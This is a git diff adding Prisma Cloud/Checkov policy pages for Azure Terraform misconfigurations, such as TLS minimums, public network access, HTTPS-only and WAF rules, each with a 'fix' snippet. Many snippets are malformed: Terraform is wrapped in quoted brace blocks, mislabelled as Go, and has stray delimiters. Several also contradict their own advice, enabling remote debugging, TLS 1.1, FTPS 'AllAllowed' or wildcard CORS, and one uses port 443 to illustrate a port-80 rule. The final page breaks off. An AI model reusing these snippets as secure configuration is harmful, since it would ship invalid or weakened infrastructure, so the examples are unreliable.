Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 410f5fac-b595-48c4-9cd1-eefabcb99616 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py[CKV_AZURE_155] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling debugging for your Azure App Service slot can help improve the security of your app. +Debugging allows you to troubleshoot issues with your app by providing access to detailed information about how the app is functioning. +However, it can also make it easier for attackers to gain access to sensitive information about your app, such as its code and configuration. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service_slot +* *Arguments:* remote_debugging_enabled (default is false) + + +[source,go] +---- +{ + "resource "azurerm_app_service_slot" "pass2" { + name = "ted" + app_service_name = azurerm_app_service.example.name + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + + https_only = false #thedefault + + + site_config { + dotnet_framework_version = "v4.0" + min_tls_version = "1.2" #the default is 1.2 + remote_debugging_enabled = false #default is false + } + + + app_settings = { + "SOME_KEY" = "some-value" + } + + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..dd1150080 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,80 @@ +== Azure App's service slot does not use the latest version of TLS encryption +// Azure App Service slot does not use the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9d64bfd7-afd2-44fa-bd86-7ecd76d3d82a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py[CKV_AZURE_154] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your App service slots. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service_slot +* *Arguments:* min_tls_version + + +[source,go] +---- +{ + "resource "azurerm_app_service_slot" "pass2" { + name = "ted" + app_service_name = azurerm_app_service.example.name + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + + https_only = false #thedefault + + + site_config { + dotnet_framework_version = "v4.0" + min_tls_version = "1.2" #the default is 1.2 + remote_debugging_enabled = true #default is false + } + + + app_settings = { + "SOME_KEY" = "some-value" + } + + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc new file mode 100644 index 000000000..ab515cfe7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc @@ -0,0 +1,58 @@ +== Azure Cognitive Services accounts enable public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 65cc30f0-f49c-4d12-a025-8390dc634b08 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py[CKV_AZURE_134] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access property improves security by ensuring your Azure Cognitive Services can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of Azure IP range and denies all logins that match IP or virtual network-based firewall rules. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cognitive_account +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_cognitive_account" "examplea" { + name = "example-account" + location = var.resource_group.location + resource_group_name = var.resource_group.name + kind = "Face" + public_network_access_enabled = false + sku_name = "S0" +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc new file mode 100644 index 000000000..39f9fd91f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc @@ -0,0 +1,61 @@ +== Azure Databricks workspace is public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c4997cfc-33ae-4277-b9f1-41b614b1ba31 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py[CKV_AZURE_158] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access property improves security by ensuring your Azure Databricks workspace can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of Azure IP range and denies all logins that match IP or virtual network-based firewall rules. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_databricks_workspace +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_databricks_workspace" "pass" { + name = "databricks-test" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + sku = "standard" + public_network_access_enabled = false + + tags = { + Environment = "Production" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..3130061c0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,71 @@ +== Azure Function app does not use the latest version of TLS encryption + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7c24e2c1-3ef1-49bf-aaf4-f1a8e5459186 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py[CKV_AZURE_145] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your Azure Function apps. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app +* *Arguments:* site_config.min_tls_version + + +[source,go] +---- +{ + "resource "azurerm_function_app" "pass2" { + name = "test-azure-functions" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + storage_account_name = azurerm_storage_account.example.name + storage_account_access_key = azurerm_storage_account.example.primary_access_key + https_only = false + + site_config { + dotnet_framework_version = "v4.0" + scm_type = "LocalGit" + min_tls_version = 1.2 + ftps_state = "AllAllowed" + http2_enabled = false + cors { + allowed_origins = ["*"] + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc new file mode 100644 index 000000000..fc5066c13 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc @@ -0,0 +1,60 @@ +== Azure HTTP (port 80) access from the internet is not restricted + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 85be5381-9513-450c-8b26-f5f5f638af46 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_160] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Restricting access to Azure HTTP (port 80) from the internet can help improve the security of your resources. +Port 80 is used for HTTP traffic, and allowing access to it from the internet can expose your resources to potential security threats, such as malware, data breaches, and unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_rule +* *Arguments:* destination_port_range + + +[source,go] +---- +{ + "resource "azurerm_network_security_rule" "https" { + name = "example" + access = "Allow" + direction = "Inbound" + network_security_group_name = "azurerm_network_security_group.example.name" + priority = 100 + protocol = "Tcp" + resource_group_name = "azurerm_resource_group.example.name" + + destination_port_range = 443 + source_address_prefix = "Internet" +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc new file mode 100644 index 000000000..77a330ba0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc @@ -0,0 +1,67 @@ +== Azure Machine Learning Workspace is publicly accessible + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9aa11e2f-5491-4782-81f3-a8508bde6366 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLPublicAccess.py[CKV_AZURE_144] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling the public network access property improves security by ensuring your Azure Machine Learning Workspaces can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of Azure IP range and denies all logins that match IP or virtual network-based firewall rules. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_machine_learning_workspace +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_machine_learning_workspace" "ckv_unittest_pass" { + name = "example-workspace" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + application_insights_id = azurerm_application_insights.example.id + key_vault_id = azurerm_key_vault.example.id + storage_account_id = azurerm_storage_account.example.id + public_network_access_enabled = false + + identity { + type = "SystemAssigned" + } + + + encryption { + key_vault_id = azurerm_key_vault.example.id + key_id = azurerm_key_vault_key.example.id + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..87ecb3c42 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,57 @@ +== Azure PostgreSQL does not use the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 60cb4ec2-7c4b-446d-a8a8-715172aa0974 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py[CKV_AZURE_147] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your PostgreSQL servers. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* ssl_minimal_tls_version_enforced + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "pass" { + name = "fail" + + public_network_access_enabled = true + ssl_enforcement_enabled = true + ssl_minimal_tls_version_enforced = "TLS1_2" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..548b8ad05 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,71 @@ +== Azure Redis Cache does not use the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d4827453-7559-4044-96fe-786493016357 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your Azure Redis Cache instances. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_redis_cache +* *Arguments:* minimum_tls_version + + +[source,go] +---- +{ + "resource "azurerm_redis_cache" "pass" { + name = "timeout-redis" + location = "West Europe" + resource_group_name = azurerm_resource_group.example_rg.name + subnet_id = azurerm_subnet.example_redis_snet.id + + family = "P" + capacity = 1 + sku_name = "Premium" + shard_count = 1 + + enable_non_ssl_port = false + minimum_tls_version = "1.2" + public_network_access_enabled = true + + redis_configuration { + enable_authentication = true + maxmemory_policy = "volatile-lru" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc new file mode 100644 index 000000000..b41643ec3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc @@ -0,0 +1,58 @@ +== Azure Spring Cloud API Portal is not enabled for HTTPS + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 82feaacd-2f2a-42ee-a6bd-f20d36f20489 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py[CKV_AZURE_161] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling HTTPS for your Azure Spring Cloud API Portal can help improve the security of your API portal. +HTTPS is a secure protocol that encrypts data in transit, and using it can help prevent attackers from intercepting and reading your data. + +=== Fix - Buildtime + +* *Resources:* azurerm_spring_cloud_api_portal +* *Attribute:* https_only_enabled + + +[source,go] +---- +{ + "resource "azurerm_spring_cloud_api_portal" "pass" { + name = "default" + spring_cloud_service_id = azurerm_spring_cloud_service.example.id + gateway_ids = [azurerm_spring_cloud_gateway.example.id] + https_only_enabled = true + public_network_access_enabled = true + instance_count = 1 + sso { + client_id = "test" + client_secret = "secret" + issuer_uri = "https://www.example.com/issueToken" + scope = ["read"] + } + +}", +} +---- +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc new file mode 100644 index 000000000..1057f0c08 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc @@ -0,0 +1,61 @@ +== Azure Spring Cloud API Portal Public Access Is Enabled +// Azure Spring Cloud API Portal public access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e3fc2a79-0fb0-45ab-97f4-302fab481ec4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py[CKV_AZURE_162] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access property improves security by ensuring your Spring Cloud API Portals can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of Azure IP range and denies all logins that match IP or virtual network-based firewall rules. + +=== Fix - Buildtime + +* *Resources:* azurerm_spring_cloud_api_portal +* *Attribute:* public_network_access_enabled (default is "false") + + +[source,text] +---- +{ + "resource "azurerm_spring_cloud_api_portal" "pass" { + name = "default" + spring_cloud_service_id = azurerm_spring_cloud_service.example.id + gateway_ids = [azurerm_spring_cloud_gateway.example.id] + https_only_enabled = false + public_network_access_enabled = false + instance_count = 1 + sso { + client_id = "test" + client_secret = "secret" + issuer_uri = "https://www.example.com/issueToken" + scope = ["read"] + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc new file mode 100644 index 000000000..d1daee652 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc @@ -0,0 +1,75 @@ +== Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5f1492e8-2667-431e-b60a-6a0e6ec5c117 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py[CKV_AZURE_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Redirecting all HTTP traffic to HTTPS for your Azure web app in the App Service slot can help improve the security of your app. +HTTPS is a secure protocol that encrypts data in transit, and using it can help prevent attackers from intercepting and reading your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service_slot +* *Arguments:* https_only (true is default) + + +[source,go] +---- +{ + "resource "azurerm_app_service_slot" "pass" { + name = random_id.server.hex + app_service_name = azurerm_app_service.example.name + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + + https_only = true #thedefault + min_tls_version="1.1" #the default is 1.2 + remote_debugging_enabled=true #default is false + + site_config { + dotnet_framework_version = "v4.0" + } + + + app_settings = { + "SOME_KEY" = "some-value" + } + + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc new file mode 100644 index 000000000..455230a73 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc @@ -0,0 +1,58 @@ +== Cosmos DB accounts do not have restricted access +// Azure Cosmos DB account access unrestricted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a778e484-5b56-47ad-b51a-12cd8f688e92 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py[CKV_AZURE_99] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Cosmos DB is a globally distributed database service that provides multiple ways to secure and protect your data, such as network isolation, virtual networks, Azure Private Link, and Azure AD authentication. +By restricting access to your Cosmos DB account, you can control who can access your database and what actions they can perform on it. +By ensuring that your Cosmos DB accounts have restricted access, you can help to improve the security of your database and protect it from unauthorized access or attacks. +This can help to ensure that your database is secure and available for your users. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + " resource "azurerm_cosmosdb_account" "db" { + ... + + public_network_access_enabled = false + ... + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..a3c39ecc1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,74 @@ +== Azure Front Door Web application firewall (WAF) policy rule for Remote Command Execution is disabled +// Azure Front Door Web Application Firewall (WAF) policy rule for Remote Command Execution disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 17b5c119-cfce-482b-8c72-ead2bc5e333f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py[CKV_AZURE_133] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Using a vulnerable version of Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string which can potentially lead to a risky code execution, data leakage and more. +Set your Front Door Web Application Firewall (WAF) to prevent executing such mechanism using the rule definition below. +Azure WAF has updated Default Rule Set (DRS) versions 1.0 and 1.1 with rule 944240 "`Remote Command Execution`" under Managed Rules to help in detecting and mitigating this vulnerability. +This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228] + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor_firewall_policy + + +[source,go] +---- +{ + "resource "azurerm_frontdoor_firewall_policy" "example" { + name = "example" + resource_group_name = "example" + + managed_rule { + type = "Microsoft_DefaultRuleSet" + version = "1.1" + + override { + rule_group_name = "JAVA" + + rule { + action = "Block" + enabled = true + rule_id = "944240" + } + + } + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc new file mode 100644 index 000000000..230cb3adc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc @@ -0,0 +1,55 @@ +== public network access enabled' is not set to 'False' for mySQL servers +// mySQL servers enable public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0224a383-4c7c-4dca-b52c-f6fab8014666 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py[CKV_AZURE_53] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By disabling public network access and only allowing connections from trusted IP addresses or networks, you can help to mitigate these risks and ensure that only authorized users and systems are able to connect to the MySQL server. +This can help to protect the server and its data from unauthorized access or attacks, and can help to maintain the confidentiality, integrity, and availability of the server and its resources. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_mysql_server" "examplea" { + ... ++ public_network_access_enabled = false +}", + +} +---- +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc new file mode 100644 index 000000000..f81e3b921 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc @@ -0,0 +1,60 @@ +== API management services do not use virtual networks +// Azure API Management services do not use virtual networks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2fe7b111-9608-48a5-8062-7878f8ca9c2e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py[CKV_AZURE_107] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +A virtual network is a logical network in Azure that is isolated from other networks. +When you configure your API management service to use a virtual network, you can control the inbound and outbound network traffic to and from your service using network security groups (NSGs) and service endpoints. +This can help to improve the security of your service and protect it from unauthorized access or attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_api_management +* *Arguments:* virtual_network_configuration + + +[source,go] +---- +{ + "resource "azurerm_api_management" "example" { + ... + + virtual_network_configuration { + subnet_id = azure_subnet.subnet_not_public_ip.id + } + + .... + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc new file mode 100644 index 000000000..235805cc1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc @@ -0,0 +1,58 @@ +== Azure application gateway does not have WAF enabled +// Web Application Firewall (WAF) for Azure Application Gateway disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff7f6448-42a0-47fd-9e00-cb8b3cf21f0a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF is a security feature that provides protection for web applications by inspecting incoming traffic and blocking malicious requests before they reach the application. +When WAF is enabled on an Azure application gateway, it analyzes incoming traffic to the gateway and blocks requests that are determined to be malicious based on a set of rules. +This can help to protect your application from a variety of threats, such as SQL injection attacks, cross-site scripting (XSS) attacks, and other types of attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_application_gateway +* *Arguments:* waf_configuration.enabled + + +[source,go] +---- +{ + " resource "azurerm_application_gateway" "network" { + ... ++ waf_configuration { ++ enabled = true + } + + }", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc new file mode 100644 index 000000000..13728e247 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc @@ -0,0 +1,59 @@ +== Application gateway does not use WAF in Detection or Prevention modes +// Azure Application Gateway does not use Web Application Firewall (WAF) in Detection or Prevention mode + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3dc2478c-bf25-4383-aaa1-30feb5cda586 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py[CKV_AZURE_122] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF has two modes: Detection and Prevention. +In Detection mode, WAF analyzes incoming traffic to the application gateway and logs any requests that are determined to be malicious based on a set of rules. +This can help you to identify potential security threats and take appropriate action to protect your application. +In Prevention mode, WAF analyzes incoming traffic to the application gateway and blocks any requests that are determined to be malicious based on a set of rules. +This can help to prevent malicious requests from reaching your application and potentially causing damage. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_web_application_firewall_policy +* *Arguments:* policy_settings.enabled + policy_settings.mode + + +[source,go] +---- +resource "azurerm_web_application_firewall_policy" "example" { + ... + policy_settings { ++ mode = "Prevention" + request_body_check = true + file_upload_limit_in_mb = 100 + max_request_body_size_in_kb = 128 + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc new file mode 100644 index 000000000..0cb47daf2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc @@ -0,0 +1,55 @@ +== Azure cache for Redis has public network access enabled +// Azure Cache for Redis public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 446da765-1694-4f82-a6fe-3e657b5ac3d2 + +|Checkov Check ID +| 